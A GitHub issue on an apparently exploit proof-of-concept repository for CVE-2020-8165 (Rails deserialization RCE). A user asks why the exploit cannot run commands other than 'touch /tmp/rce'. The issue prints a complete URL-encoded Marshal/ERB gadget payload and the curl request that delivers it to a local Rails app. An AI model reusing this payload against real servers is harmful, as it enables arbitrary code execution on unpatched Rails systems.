masahiro331 / CVE-2020-8165


Cannot execute other commands? #22

Open nchigmaroff opened 11 months ago

nchigmaroff commented 11 months ago

Hi,

I am able to use the provided exploit code to create the /tmp/rce file, by running the curl command twice. However, I cannot modify the code to create other files or run other commands.

I changed the code touch /tmp/rce to touch /tmp/rce2 and ran the rest of the Ruby code in the same way.

From this, I generated the payload %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

And ran the request curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T' twice.

However, this did not create a new file /tmp/rce2. I am also not able to successfully run any other commands, such as rm, echo 'x' > /tmp/rce, or ping.

Do you have any advice on why this is not working?

Thank you!